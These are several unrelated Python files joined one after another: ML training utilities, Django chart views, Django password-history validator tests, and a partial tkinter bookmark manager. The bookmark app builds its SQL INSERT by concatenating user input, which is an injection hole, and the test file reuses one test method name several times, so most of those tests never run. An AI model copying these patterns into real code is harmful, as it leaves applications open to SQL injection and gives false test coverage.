"Training True Positive": train_report[0], "Training False Positive": train_report[1],
"Training True Negative": train_report[2], "Training False Negative": train_report[3],
"Training Recall": train_report[4], "Training Precision": train_report[5],
"Training F1 Score": train_report[6], "Training ROC AUC": train_report[7],
"Training Report": train_report[8],
"Test True Positive": test_report[0], "Test False Positive": test_report[1],
"Test True Negative": test_report[2], "Test False Negative": test_report[3],
"Test Recall": test_report[4], "Test Precision": test_report[5],
"Test F1 Score": test_report[6], "Test RO AUC": test_report[7],
"Test Report": test_report[8]}
metrics_arr = np.array(metrics_arr).reshape(n_CV, 4)
print("Average Training Set Accuracy {:.3f}".format(np.average(metrics_arr[:, 1].ravel())))
print("Average Testing Set Accuracy {:.3f}".format(np.average(metrics_arr[:, 3].ravel())))
return results_dict
def evaluate_model(model, x_tr, y_tr, x_ts, y_ts, val_split=0.0,
batch_size=32, epochs=50, callbacks=[],
metric_names=['accuracy', 'loss']):
"""
@brief: Train the model and evaluate it on training and test set and return the results.
@param: model: TF model
@param: x_tr: training x
@param: y_tr: training y
@param: x_ts: test x
@param: y_ts: test y
@param: val_split: validation set split
@param: BATCH_SIZE (int): default value 32
@param: EPOCHS (int): default value 50
@param: callbacks: TF callback functions
@param: metric_names
@return: Train and test metrics
"""
# plot loss function
plot_loss_cb = PlotLosses(metric_names)
cbs = [plot_loss_cb]
# append other callbacks
for c in callbacks:
cbs.append(c)
# fit the model
model_history = model.fit(x_tr, y_tr, batch_size = batch_size, epochs = epochs,
validation_split = val_split, verbose = 0, callbacks = cbs)
# get the performance values
train_metrics = model.evaluate(x_tr, y_tr)
test_metrics = model.evaluate(x_ts, y_ts)
return train_metrics, test_metrics
def segment_sensor_reading(values, window_duration, overlap_percentage,
sampling_frequency):
"""
Sliding window segmentation of the values array for the given window
duration and overlap percentage.
param values: 1D array of values to be segmented
param window_duration: Window duration in seconds
param overlap_percentage: Float value in the range (0 < overlap_percentage < 1)
param sampling_frequency: Frequency in Hz
"""
total_length = len(values)
window_length = sampling_frequency * window_duration
segments = []
if(total_length < window_length):
return segments
start_index = 0
end_index = start_index + window_length
increment_size = int(window_length * (overlap_percentage))
while(1):
# print(start_index, end_index)
# get the segment
v = values[start_index:end_index]
# save the segment
segments.append(v)
# change the start and end index values
start_index += increment_size
end_index += increment_size
if (start_index > total_length) | (end_index > total_length):
#print("we are done, no more segments possible")
break
segments = np.array(segments).reshape(len(segments), window_length)
return segments
def create_tf_dataset(X, Y, batch_size, test_size=0.3):
""" Create train and test TF dataset from X and Y
The prefetch overlays the preprocessing and model execution of a training step.
While the model is executing training step s, the input pipeline is reading the data for step s+1.
AUTOTUNE automatically tune the number for sample which are prefeteched automatically.
Keyword arguments:
X -- numpy array
Y -- numpy array
batch_size -- integer
"""
AUTOTUNE = tf.data.experimental.AUTOTUNE
X = X.astype('float32')
Y = Y.astype('float32')
x_tr, x_ts, y_tr, y_ts = train_test_split(X, Y, test_size = 0.3, random_state=42, stratify=Y, shuffle=True)
print(f"Train size: {x_tr.shape[0]}")
print(f"Test size: {x_ts.shape[0]}")
train_dataset = tf.data.Dataset.from_tensor_slices((x_tr, y_tr))
train_dataset = train_dataset.shuffle(buffer_size=1000, reshuffle_each_iteration=True)
train_dataset = train_dataset.batch(batch_size).prefetch(AUTOTUNE)
test_dataset = tf.data.Dataset.from_tensor_slices((x_ts, y_ts))
test_dataset = test_dataset.batch(batch_size).prefetch(AUTOTUNE)
return train_dataset, test_dataset
def check_continuity(array):
"""
Check whether the array contains continous values or not like 1, 2, 3, 4, ..
"""
max_v = max(array)
min_v = min(array)
n = len(array)
# print(n, min_v, max_v)
if max_v - min_v + 1 == n:
# print("Given array has continous values")
return True
else:
# print("Given array is not continous")
return False
if __name__ == "__main__":
print("Script with utilities functions used throughout the research projects.")
print("Availabel Functions are:")
print(get_cnn_model.__doc__)
print(get_features_labels_from_df.__doc__)
print(print_confusion_matrix.__doc__)
print(PlotLosses.__doc__)
print(save_data.__doc__)
print(read_data.__doc__)
print(stylize_axis.__doc__)
print(print_metrics.__doc__)
print(compute_performance_metrics.__doc__)
print(split_into_train_test.__doc__)
print(get_hot_labels.__doc__)
print(find_min_max.__doc__)
print(load_data_with_preprocessing.__doc__)
print(evaluate_model.__doc__)
print(cross_validation.__doc__)
print(segment_sensor_reading.__doc__)
print(create_tf_dataset.__doc__)
|
from django.shortcuts import render
from django.views.generic import TemplateView
from django.views.generic.list import ListView
from django.http import JsonResponse
from django.db.models import Count
from .models import ChartConfig
from editions.models import Edition, Period
from browsing.filters import EditionListFilter
from browsing.forms import GenericFilterFormHelper
from browsing.views import GenericListView
from browsing.views import EditionTable
from collections import Counter
from .chart_config import EDITION_CHART_CONF
class ChartSelector(ListView):
model = ChartConfig
template_name = 'charts/select_chart.html'
class DynChartView(GenericListView):
model = Edition
table_class = EditionTable
filter_class = EditionListFilter
formhelper_class = GenericFilterFormHelper
template_name = 'charts/dynchart.html'
def get_context_data(self, **kwargs):
context = super(DynChartView, self).get_context_data()
property_name = self.kwargs['property']
context['property_name'] = property_name
try:
chart = ChartConfig.objects.get(
field_path=self.kwargs['property']
)
except:
context['error'] = True
return context
context[self.context_filter_name] = self.filter
context['charttype'] = self.kwargs['charttype']
modelname = self.model.__name__
payload = []
objects = self.get_queryset()
for x in objects.values(property_name).annotate(
amount=Count(property_name)).order_by('amount'):
if x[property_name]:
payload.append(["{}".format(x[property_name]), x['amount']])
else:
payload.append(['None', x['amount']])
context['all'] = self.model.objects.count()
if chart.legend_x:
legendx = chart.legend_x
else:
legendx = "# of {}s".format(modelname)
data = {
"items": "{} out of {}".format(objects.count(), context['all']),
"title": "{}".format(chart.label),
"subtitle": "{}".format(chart.help_text),
"legendy": chart.legend_y,
"legendx": legendx,
"categories": "sorted(dates)",
"measuredObject": "{}s".format(modelname),
"ymin": 0,
"payload": payload
}
context['data'] = data
return context
DATA = {"status": "ok",
"query": "api:graph",
"timestamp": "2016-07-21T09:56:36.803Z",
"items": "7",
"title": "LASK4EVER",
"subtitle": "This is just a test to check if everythin works as expected.",
"legendx": "Club",
"legendy": "# of Victories",
"measuredObject": "Victories",
"ymin": -10,
"payload": [
["Club", "# of Victories"],
["LASK", 10],
["Real Madrid", 4],
["Rapid Wien", 0],
["<NAME>", -10]
]
}
DATA_PIECHART = {
"items": "2",
"title": "LASK4EVER",
"subtitle": "This is just a test.",
"measuredObject": "# of Victories",
"payload": [
["LASK", 9], ["<NAME>", 1]
]
}
def barcharts_view(request):
context = {"test": "test"}
return render(request, 'charts/bar_charts.html', context)
def piecharts_view(request):
context = {"test": "test"}
return render(request, 'charts/pie_charts.html', context)
def xmltei_json(request):
CHOICES_TEI = {
"N/A": "N/A",
"no information provided": "no information provided",
"not provided": "not provided",
"not catalogued yet": "not catalogued yet",
"0": "XML not used",
"0.5": "XML but not TEI",
"1": "XML-TEI is used"
}
editions = Edition.objects.values(
'tei_transcription').annotate(total=Count('tei_transcription')).order_by('-total')
payload = []
for x in editions:
if x["tei_transcription"] is not None:
legend = CHOICES_TEI[x["tei_transcription"]]
entry = [legend, x['total']]
payload.append(entry)
data = {
"items": len(Edition.objects.all()),
"title": "Usage of XML and TEI",
"subtitle": "The source text is encoded in XML-TEI.",
"legendx": "Encoding",
"legendy": "# of Editions",
"measuredObject": "Editions",
"ymin": 0,
"payload": payload
}
return JsonResponse(data)
def editions_per_country_json(request):
editions = Edition.objects.all()
countries = []
for x in editions:
for y in x.institution.all():
if y.place is not None:
countries.append(y.place.part_of.name)
countries = Counter(countries)
payload = list(map(list, countries.items()))
data = {
"items": len(editions),
"title": "Editions per country",
"subtitle": "Geographical distribution of editions based on producing institutions.",
"legendx": "Countries",
"legendy": "# of Editions",
"measuredObject": "Editions",
"ymin": 0,
"payload": payload
}
return JsonResponse(data)
def facs_json(request):
editions = Edition.objects.values(
'images').annotate(total=Count('images')).order_by('-total')
payload = []
for x in editions:
if x["images"] is not None:
legend = x["images"]
entry = [legend, x['total']]
payload.append(entry)
data = {
"items": len(Edition.objects.all()),
"title": "Images available?",
"subtitle": "Do editions contain digital images of the primary source(s)?",
"legendx": "images?",
"legendy": "# of Editions",
"measuredObject": "Editions",
"ymin": 0,
"payload": payload
}
return JsonResponse(data)
def xmldownload_json(request):
CHOICES_DOWNLOAD = (
("", "----"),
("no information provided", "no information provided"),
("not catalogued yet", "not catalogued yet"),
("0", "no"),
("0.5", "partially"),
("1", "yes"),
("N/A", "N/A")
)
editions = Edition.objects.values(
'download').annotate(total=Count('download')).order_by('-total')
payload = []
for x in editions:
if x["download"] is not None:
legend = dict(CHOICES_DOWNLOAD)[x["download"]]
entry = [legend, x['total']]
payload.append(entry)
data = {
"items": len(Edition.objects.all()),
"title": "Access to the Data",
"subtitle": "The XML-TEI encoded text is available for download.",
"legendx": "download possible",
"legendy": "# of Editions",
"measuredObject": "Editions",
"ymin": 0,
"payload": payload
}
return JsonResponse(data)
def indices_json(request):
editions = Edition.objects.values(
'indices').annotate(total=Count('indices')).order_by('-total')
payload = []
for x in editions:
if x["indices"] is not None:
legend = x["indices"]
entry = [legend, x['total']]
payload.append(entry)
data = {
"items": len(Edition.objects.all()),
"title": "Indices provided",
"subtitle": "Is the edition's content accessable by indices?",
"legendx": "indices",
"legendy": "# of Editions",
"measuredObject": "Editions",
"ymin": 0,
"payload": payload
}
return JsonResponse(data)
def cc_json(request):
editions = Edition.objects.values(
'cc_license').annotate(total=Count('cc_license')).order_by('-total')
payload = []
for x in editions:
if x["cc_license"] is not None:
legend = x["cc_license"]
entry = [legend, x['total']]
payload.append(entry)
data = {
"items": len(Edition.objects.all()),
"title": "Creative Commons License",
"subtitle": "Is the work published using a Creative Commons License",
"legendx": "cc-license",
"legendy": "# of Editions",
"measuredObject": "Editions",
"ymin": 0,
"payload": payload
}
return JsonResponse(data)
def advanced_search_json(request):
editions = Edition.objects.values(
'advanced_search').annotate(total=Count('advanced_search')).order_by('-total')
payload = []
for x in editions:
if x["advanced_search"] is not None:
legend = x["advanced_search"]
entry = [legend, x['total']]
payload.append(entry)
data = {
"items": len(Edition.objects.all()),
"title": "Advanced Search Functionalites",
"subtitle": "Are there any advanced search functionalites available?",
"legendx": "advanced search",
"legendy": "# of Editions",
"measuredObject": "Editions",
"ymin": 0,
"payload": payload
}
return JsonResponse(data)
def search_json(request):
editions = Edition.objects.values(
'search').annotate(total=Count('search')).order_by('-total')
payload = []
for x in editions:
if x["search"] is not None:
legend = x["search"]
entry = [legend, x['total']]
payload.append(entry)
data = {
"items": len(Edition.objects.all()),
"title": "Full Text Search",
"subtitle": "Is the work searchable in its full text (string match search)?",
"legendx": "searchable",
"legendy": "# of Editions",
"measuredObject": "Editions",
"ymin": 0,
"payload": payload
}
return JsonResponse(data)
def historical_periode_json(request):
editions = Edition.objects.values(
'historical_period').annotate(total=Count('historical_period')).order_by('-total')
payload = []
for x in editions:
if x["historical_period"] is not None:
temp_period = Period.objects.get(id=x["historical_period"])
entry = [temp_period.name, x['total']]
payload.append(entry)
data = {
"items": len(Edition.objects.all()),
"title": "Editions per Period",
"subtitle": "Distribution of Editions over Periods",
"legendx": "Historical Periods",
"legendy": "# of Editions",
"measuredObject": "Editions",
"ymin": 0,
"payload": payload
}
return JsonResponse(data)
def test_json(request):
data = DATA
return JsonResponse(data)
def test_json_pie(request):
data = DATA_PIECHART
return JsonResponse(data)
|
from django.contrib.auth import get_user_model
from django.contrib.auth.password_validation import validate_password
from django.core.exceptions import ValidationError
from django.test import TestCase, override_settings
from django_password_validators.password_history.password_validation import UniquePasswordsValidator
from django_password_validators.password_history.hashers import (
HistoryVeryStrongHasher,
HistoryHasher
)
from django_password_validators.password_history.models import (
UserPasswordHistoryConfig,
PasswordHistory
)
from .base import PasswordsTestCase
class UniquePasswordsValidatorTestCase(PasswordsTestCase):
def test_create_user(self):
self.create_user(1)
self.assertEqual(PasswordHistory.objects.all().count(), 1)
self.assertEqual(UserPasswordHistoryConfig.objects.all().count(), 1)
def test_none_user(self):
dummy_user = get_user_model()
upv = UniquePasswordsValidator()
upv.validate('qwerty', None)
upv.password_changed('<PASSWORD>', None)
self.assertEqual(PasswordHistory.objects.all().count(), 0)
self.assertEqual(UserPasswordHistoryConfig.objects.all().count(), 0)
def test_not_saved_user(self):
dummy_user = get_user_model()
upv = UniquePasswordsValidator()
upv.validate('qwerty', dummy_user)
upv.password_changed('<PASSWORD>', dummy_<PASSWORD>)
dummy_user = get_user_model()()
upv = UniquePasswordsValidator()
upv.validate('qwerty', dummy_user)
upv.password_changed('<PASSWORD>', dummy_<PASSWORD>)
self.assertEqual(PasswordHistory.objects.all().count(), 0)
self.assertEqual(UserPasswordHistoryConfig.objects.all().count(), 0)
def test_create_multiple_users(self):
self.create_user(1)
self.create_user(2)
self.assertEqual(PasswordHistory.objects.all().count(), 2)
self.assertEqual(UserPasswordHistoryConfig.objects.all().count(), 2)
def test_user_changed_password(self):
self.create_user(1)
self.user_change_password(user_number=1, password_number=2)
# We check that there are no duplicate hashes passwords in the database
self.user_change_password(user_number=1, password_number=2)
# They must be only two hashes
self.assertEqual(PasswordHistory.objects.all().count(), 2)
self.assert_password_validation_False(user_number=1, password_number=2)
self.assert_password_validation_True(user_number=1, password_number=3)
self.user_change_password(user_number=1, password_number=3)
self.assert_password_validation_False(user_number=1, password_number=3)
def test_change_number_hasher_iterations(self):
self.create_user(1)
self.user_change_password(user_number=1, password_number=2)
with self.settings(
DPV_DEFAULT_HISTORY_HASHER='django_password_validators.password_history.hashers.HistoryVeryStrongHasher'):
self.assert_password_validation_False(
user_number=1,
password_number=1
)
self.assert_password_validation_False(
user_number=1,
password_number=2
)
self.assert_password_validation_True(
user_number=1,
password_number=3
)
self.user_change_password(
user_number=1,
password_number=3
)
self.assert_password_validation_False(
user_number=1,
password_number=3
)
self.assertEqual(
PasswordHistory.objects.filter(
user_config__iterations=HistoryHasher.iterations).count(),
2,
)
self.assertEqual(
PasswordHistory.objects.filter(
user_config__iterations=HistoryVeryStrongHasher.iterations).count(),
1,
)
@override_settings(AUTH_PASSWORD_VALIDATORS=[{
'NAME': 'django_password_validators.password_history.password_validation.UniquePasswordsValidator',
'OPTIONS': {
'last_passwords': 0
}
}])
def test_last_password__1_pass_history(self):
user1 = self.create_user(1)
user_config_1 = UserPasswordHistoryConfig.objects.filter(user=user1)[0]
PasswordHistory.objects.filter(user_config=user_config_1).delete()
# This password cannot be taken during validation. It is out of range.
# It is the oldest so out of range.
self.user_change_password(user_number=1, password_number=2)
self.user_change_password(user_number=1, password_number=1)
self.user_change_password(user_number=1, password_number=3)
# Passwords known in the scope we are checking
self.assert_password_validation_False(user_number=1, password_number=2)
# Passwords known in the scope we are checking
self.assert_password_validation_False(user_number=1, password_number=1)
# Passwords known in the scope we are checking
self.assert_password_validation_False(user_number=1, password_number=3)
# New unknown password
self.assert_password_validation_True(user_number=1, password_number=4)
self.assertEqual(PasswordHistory.objects.filter(user_config__user=user1).count(), 3)
@override_settings(AUTH_PASSWORD_VALIDATORS=[{
'NAME': 'django_password_validators.password_history.password_validation.UniquePasswordsValidator',
'OPTIONS': {
'last_passwords': 1
}
}])
def test_last_password__1_pass_history(self):
user1 = self.create_user(1)
user_config_1 = UserPasswordHistoryConfig.objects.filter(user=user1)[0]
PasswordHistory.objects.filter(user_config=user_config_1).delete()
# This password cannot be taken during validation. It is out of range.
# It is the oldest so out of range.
self.user_change_password(user_number=1, password_number=2)
self.user_change_password(user_number=1, password_number=1)
self.user_change_password(user_number=1, password_number=3)
# Password out of scope. We interpret it as if it had never been entered.
self.assert_password_validation_True(user_number=1, password_number=2)
# Password out of scope. We interpret it as if it had never been entered.
self.assert_password_validation_True(user_number=1, password_number=1)
# Passwords known in the scope we are checking
self.assert_password_validation_False(user_number=1, password_number=3)
# New unknown password
self.assert_password_validation_True(user_number=1, password_number=4)
self.assertEqual(PasswordHistory.objects.filter(user_config__user=user1).count(), 1)
@override_settings(AUTH_PASSWORD_VALIDATORS=[{
'NAME': 'django_password_validators.password_history.password_validation.UniquePasswordsValidator',
'OPTIONS': {
'last_passwords': 2
}
}])
def test_last_password__1_pass_history(self):
user1 = self.create_user(1)
user_config_1 = UserPasswordHistoryConfig.objects.filter(user=user1)[0]
PasswordHistory.objects.filter(user_config=user_config_1).delete()
# This password cannot be taken during validation. It is out of range.
# It is the oldest so out of range.
self.user_change_password(user_number=1, password_number=2)
self.user_change_password(user_number=1, password_number=1)
self.user_change_password(user_number=1, password_number=3)
# Password out of scope. We interpret it as if it had never been entered.
self.assert_password_validation_True(user_number=1, password_number=2)
# Passwords known in the scope we are checking
self.assert_password_validation_False(user_number=1, password_number=1)
# Passwords known in the scope we are checking
self.assert_password_validation_False(user_number=1, password_number=3)
# New unknown password
self.assert_password_validation_True(user_number=1, password_number=4)
self.assertEqual(PasswordHistory.objects.filter(user_config__user=user1).count(), 2)
@override_settings(AUTH_PASSWORD_VALIDATORS=[{
'NAME': 'django_password_validators.password_history.password_validation.UniquePasswordsValidator',
'OPTIONS': {
'last_passwords': 3
}
}])
def test_last_password__1_pass_history(self):
user1 = self.create_user(1)
user_config_1 = UserPasswordHistoryConfig.objects.filter(user=user1)[0]
PasswordHistory.objects.filter(user_config=user_config_1).delete()
# This password cannot be taken during validation. It is out of range.
# It is the oldest so out of range.
self.user_change_password(user_number=1, password_number=2)
self.user_change_password(user_number=1, password_number=1)
self.user_change_password(user_number=1, password_number=3)
# Passwords known in the scope we are checking
self.assert_password_validation_False(user_number=1, password_number=2)
# Passwords known in the scope we are checking
self.assert_password_validation_False(user_number=1, password_number=1)
# Passwords known in the scope we are checking
self.assert_password_validation_False(user_number=1, password_number=3)
# New unknown password
self.assert_password_validation_True(user_number=1, password_number=4)
self.assertEqual(PasswordHistory.objects.filter(user_config__user=user1).count(), 3)
@override_settings(AUTH_PASSWORD_VALIDATORS=[{
'NAME': 'django_password_validators.password_history.password_validation.UniquePasswordsValidator',
'OPTIONS': {
'last_passwords': 4
}
}])
def test_last_password__1_pass_history(self):
user1 = self.create_user(1)
user_config_1 = UserPasswordHistoryConfig.objects.filter(user=user1)[0]
PasswordHistory.objects.filter(user_config=user_config_1).delete()
# This password cannot be taken during validation. It is out of range.
# It is the oldest so out of range.
self.user_change_password(user_number=1, password_number=2)
self.user_change_password(user_number=1, password_number=1)
self.user_change_password(user_number=1, password_number=3)
# Passwords known in the scope we are checking
self.assert_password_validation_False(user_number=1, password_number=2)
# Passwords known in the scope we are checking
self.assert_password_validation_False(user_number=1, password_number=1)
# Passwords known in the scope we are checking
self.assert_password_validation_False(user_number=1, password_number=3)
# New unknown password
self.assert_password_validation_True(user_number=1, password_number=4)
self.assertEqual(PasswordHistory.objects.filter(user_config__user=user1).count(), 3)
@override_settings(AUTH_PASSWORD_VALIDATORS=[{
'NAME': 'django_password_validators.password_history.password_validation.UniquePasswordsValidator',
'OPTIONS': {
'last_passwords': 2
}
}])
def test_last_password(self):
user1 = self.create_user(1)
user2 = self.create_user(2) # needed to check if we are not deleting passwords from another user
user_config_1 = UserPasswordHistoryConfig.objects.filter(user=user1)[0]
user_config_2 = UserPasswordHistoryConfig.objects.filter(user=user2)[0]
PasswordHistory.objects.filter(user_config=user_config_1).delete()
# This password cannot be taken during validation. It is out of range.
# It is the oldest so out of range.
self.user_change_password(user_number=1, password_number=2)
self.user_change_password(user_number=1, password_number=1)
self.user_change_password(user_number=1, password_number=3)
# Password out of scope. We interpret it as if it had never been entered.
self.assert_password_validation_True(user_number=1, password_number=2)
# New unknown password
self.assert_password_validation_True(user_number=1, password_number=4)
# Passwords known in the scope we are checking
self.assert_password_validation_False(user_number=1, password_number=1)
self.assert_password_validation_False(user_number=1, password_number=3)
self.assertEqual(PasswordHistory.objects.filter(user_config=user_config_1).count(), 2)
self.assertEqual(PasswordHistory.objects.filter(user_config=user_config_2).count(), 1)
# Two new non-existent passwords
self.user_change_password(user_number=1, password_number=4)
self.user_change_password(user_number=1, password_number=2)
# Password out of scope. We interpret it as if it had never been entered.
self.assert_password_validation_True(user_number=1, password_number=1)
self.assert_password_validation_True(user_number=1, password_number=3)
# Passwords known in the scope we are checking
self.assert_password_validation_False(user_number=1, password_number=4)
self.assert_password_validation_False(user_number=1, password_number=2)
self.assertEqual(PasswordHistory.objects.filter(user_config=user_config_1).count(), 2)
# We check for interaction with the other user
self.assert_password_validation_False(user_number=2, password_number=1)
self.assert_password_validation_True(user_number=2, password_number=2)
self.assert_password_validation_True(user_number=2, password_number=3)
self.assert_password_validation_True(user_number=2, password_number=4)
self.assertEqual(PasswordHistory.objects.filter(user_config=user_config_2).count(), 1)
def test_last_password__delete_old_passwords__one_user__infinite_passwords_hist(self):
user1 = self.create_user(1)
PasswordHistory.objects.filter(user_config__user=user1).delete()
user1_uphc1 = UserPasswordHistoryConfig.objects.filter(user=user1)[0]
ph1 = PasswordHistory(user_config=user1_uphc1, password='<PASSWORD>') # to delete
ph1.save()
ph2 = PasswordHistory(user_config=user1_uphc1, password='<PASSWORD>') # to delete
ph2.save()
ph3 = PasswordHistory(user_config=user1_uphc1, password='<PASSWORD>')
ph3.save()
upv = UniquePasswordsValidator(last_passwords=0)
upv.delete_old_passwords(user1)
upv = UniquePasswordsValidator(last_passwords=-1)
upv.delete_old_passwords(user1)
current_passwords = list(
PasswordHistory.objects.filter(user_config__user=user1).values_list('pk', flat=True).order_by('pk'))
self.assertEqual(
current_passwords,
[ph1.pk, ph2.pk, ph3.pk],
)
def test_last_password__delete_old_passwords__one_user__one_password_hist(self):
user1 = self.create_user(1)
user1_uphc1 = UserPasswordHistoryConfig.objects.filter(user=user1)[0]
ph1 = PasswordHistory(user_config=user1_uphc1, password='<PASSWORD>') # to delete
ph1.save()
ph2 = PasswordHistory(user_config=user1_uphc1, password='<PASSWORD>') # to delete
ph2.save()
ph3 = PasswordHistory(user_config=user1_uphc1, password='<PASSWORD>')
ph3.save()
upv = UniquePasswordsValidator(last_passwords=1)
upv.delete_old_passwords(user1)
current_passwords = list(
PasswordHistory.objects.filter(user_config__user=user1).values_list('pk', flat=True).order_by('pk'))
self.assertEqual(
current_passwords,
[ph3.pk],
)
def test_last_password__delete_old_passwords__one_user__two_passwords_hist(self):
user1 = self.create_user(1)
user1_uphc1 = UserPasswordHistoryConfig.objects.filter(user=user1)[0]
ph1 = PasswordHistory(user_config=user1_uphc1, password='<PASSWORD>') # to delete
ph1.save()
ph2 = PasswordHistory(user_config=user1_uphc1, password='<PASSWORD>')
ph2.save()
ph3 = PasswordHistory(user_config=user1_uphc1, password='<PASSWORD>')
ph3.save()
upv = UniquePasswordsValidator(last_passwords=2)
upv.delete_old_passwords(user1)
current_passwords = list(
PasswordHistory.objects.filter(user_config__user=user1).values_list('pk', flat=True).order_by('pk'))
self.assertEqual(
current_passwords,
[ph2.pk, ph3.pk],
)
def test_last_password__delete_old_passwords__one_user__three_passwords_hist(self):
user1 = self.create_user(1)
user1_uphc1 = UserPasswordHistoryConfig.objects.filter(user=user1)[0]
ph1 = PasswordHistory(user_config=user1_uphc1, password='<PASSWORD>')
ph1.save()
ph2 = PasswordHistory(user_config=user1_uphc1, password='<PASSWORD>')
ph2.save()
ph3 = PasswordHistory(user_config=user1_uphc1, password='<PASSWORD>')
ph3.save()
upv = UniquePasswordsValidator(last_passwords=3)
upv.delete_old_passwords(user1)
current_passwords = list(
PasswordHistory.objects.filter(user_config__user=user1).values_list('pk', flat=True).order_by('pk'))
self.assertEqual(
current_passwords,
[ph1.pk, ph2.pk, ph3.pk],
)
def test_last_password__delete_old_passwords__two_users(self):
user1 = self.create_user(1)
user2 = self.create_user(2)
PasswordHistory.objects.all().delete()
user1_uphc1 = UserPasswordHistoryConfig.objects.filter(user=user1)[0]
user2_uphc1 = UserPasswordHistoryConfig.objects.filter(user=user2)[0]
ph1 = PasswordHistory(user_config=user1_uphc1, password='<PASSWORD>') # to delete
ph1.save()
ph1_u2 = PasswordHistory(user_config=user2_uphc1, password='<PASSWORD>') # to delete
ph1_u2.save()
ph2 = PasswordHistory(user_config=user1_uphc1, password='<PASSWORD>')
ph2.save()
ph2_u2 = PasswordHistory(user_config=user2_uphc1, password='<PASSWORD>')
ph2_u2.save()
ph3 = PasswordHistory(user_config=user1_uphc1, password='<PASSWORD>')
ph3.save()
ph3_u2 = PasswordHistory(user_config=user2_uphc1, password='<PASSWORD>')
ph3_u2.save()
upv = UniquePasswordsValidator(last_passwords=2)
upv.delete_old_passwords(user1)
current_passwords = list(
PasswordHistory.objects. \
filter(user_config__user=user1). \
values_list('pk', flat=True). \
order_by('pk')
)
self.assertEqual(
current_passwords,
[ph2.pk, ph3.pk],
msg='Only the passwords of the first user can be deleted'
)
current_passwords = list(
PasswordHistory.objects. \
filter(user_config__user=user2). \
values_list('pk', flat=True). \
order_by('pk')
)
self.assertEqual(
current_passwords,
[ph1_u2.pk, ph2_u2.pk, ph3_u2.pk],
msg='Password history of the other user must be unchanged'
)
def test_last_password__delete_old_passwords__multiple_UserPasswordHistoryConfig(self):
user1 = self.create_user(1)
PasswordHistory.objects.all().delete()
user1_uphc1 = UserPasswordHistoryConfig.objects.filter(user=user1)[0]
user1_uphc2 = UserPasswordHistoryConfig(user=user1, salt='qwerty', iterations=10)
user1_uphc2.save()
ph1 = PasswordHistory(user_config=user1_uphc1, password='<PASSWORD>') # to delete
ph1.save()
ph2 = PasswordHistory(user_config=user1_uphc2, password='<PASSWORD>')
ph2.save()
ph3 = PasswordHistory(user_config=user1_uphc1, password='<PASSWORD>')
ph3.save()
upv = UniquePasswordsValidator(last_passwords=2)
upv.delete_old_passwords(user1)
current_passwords = list(
PasswordHistory.objects.filter(user_config__user=user1).values_list('pk', flat=True).order_by('pk'))
self.assertEqual(
current_passwords,
[ph2.pk, ph3.pk],
msg='Only the oldest password can be deleted = ph1'
)
PasswordHistory.objects.all().delete()
ph1 = PasswordHistory(user_config=user1_uphc2, password='<PASSWORD>') # to delete
ph1.save()
ph2 = PasswordHistory(user_config=user1_uphc1, password='<PASSWORD>')
ph2.save()
ph3 = PasswordHistory(user_config=user1_uphc1, password='<PASSWORD>')
ph3.save()
upv = UniquePasswordsValidator(last_passwords=2)
upv.delete_old_passwords(user1)
current_passwords = list(
PasswordHistory.objects.filter(user_config__user=user1).values_list('pk', flat=True).order_by('pk'))
self.assertEqual(
current_passwords,
[ph2.pk, ph3.pk],
msg='Only the oldest password can be deleted = ph1'
)
PasswordHistory.objects.all().delete()
ph1 = PasswordHistory(user_config=user1_uphc2, password='<PASSWORD>') # to delete
ph1.save()
ph2 = PasswordHistory(user_config=user1_uphc1, password='<PASSWORD>')
ph2.save()
ph3 = PasswordHistory(user_config=user1_uphc2, password='<PASSWORD>')
ph3.save()
upv = UniquePasswordsValidator(last_passwords=2)
upv.delete_old_passwords(user1)
current_passwords = list(
PasswordHistory.objects.filter(user_config__user=user1).values_list('pk', flat=True).order_by('pk'))
self.assertEqual(
current_passwords,
[ph2.pk, ph3.pk],
msg='Only the oldest password can be deleted = ph1'
)
PasswordHistory.objects.all().delete()
|
from tkinter import *
from tkinter import messagebox
from io import open
import sqlite3
#Functions
#savebookmark: Create the database and save the bookmark
def savebookmark():
#In the case that the database does not exist it creates it and also the HTML file
try:
myconnection=sqlite3.connect("BBDD")
mycursor=myconnection.cursor()
mycursor.execute("CREATE TABLE BOOKMARKS (LABEL VARCHAR(50), BOOKMARK VARCHAR(50) UNIQUE, URL VARCHAR(5000))")
html_file=open("file.html","w")
html_file.close()
except:
pass
#Once if the database is created Save the bookmark
finally:
myconnection=sqlite3.connect("BBDD")
mycursor=myconnection.cursor()
if entrybookmark.get() != '' and entryurl.get() != '':
try:
if entrylabel.get() == '':
strlabel.set("Temporary markers")
mycursor.execute("INSERT INTO BOOKMARKS VALUES('"+entrylabel.get()+"','" + entrybookmark.get()+ "','" + entryurl.get()+"')")
messagebox.showinfo("Bookmark Created", "The bookmark has been created: "+entrybookmark.get())
except:
#If the bookmark already exists:
messagebox.showerror("Error","The bookmark already exists")
else:
#If there is no bookmark and / or url written
messagebox.showerror("Error", "Insufficient information, make sure you get the name and URL fields")
myconnection.commit()
myconnection.close()
writehtml()
#writehtml: Write the bookmarks
def writehtml():
try:
varcss = radiovarcss.get()
if varcss == 0:
try:
html_file=open("file.html","r")
tex=html_file.read()
if len(tex)>=80:
if tex[80] == '1':
varcss = 1
elif tex [80] == '2':
varcss = 2
elif tex [80] == '3':
varcss = 3
else:
varcss = 1
else:
varcss = 1
html_file.close()
except:
varcss = 1
myconnection=sqlite3.connect("BBDD")
mycursor=myconnection.cursor()
html_file=open("file.html","w")
mycursor.execute("SELECT * FROM BOOKMARKS ")
bookmarkslist=mycursor.fetchall()
#Create the label list
labellist = []
for i in bookmarkslist:
if i[0] in labellist:
pass
else:
labellist.append(i[0])
#Write HTML
html_file.write('<!DOCTYPE html>\n<html>\n<head>\n<title>Enlaces</title>\n<meta charset="utf-8">')
#Write CSS as the case may be
if varcss == 1:
html_file.write('\n<!--1-->\n<style type="text/css">\nbody{font-family:Century Gothic;background:rgb(25,25,25);text-decoration:none;}\n.Clases{display:grid;grid-template-columns:1fr 1fr 1fr;}\n.Clase{ background-color:rgba(44,44,44,1);text-align:center;border-style:solid;border-width:10px;border-color:rgba(34,34,34,1); border-collapse:collapse;margin:10px;}\n.Clase h3{font-size:25px;color:rgba(163,48,48,1);margin:20px;padding:0px;}\n.Clase a{text-decoration:none;color:rgba(250,250,250,1);}\n</style>')
elif varcss == 2:
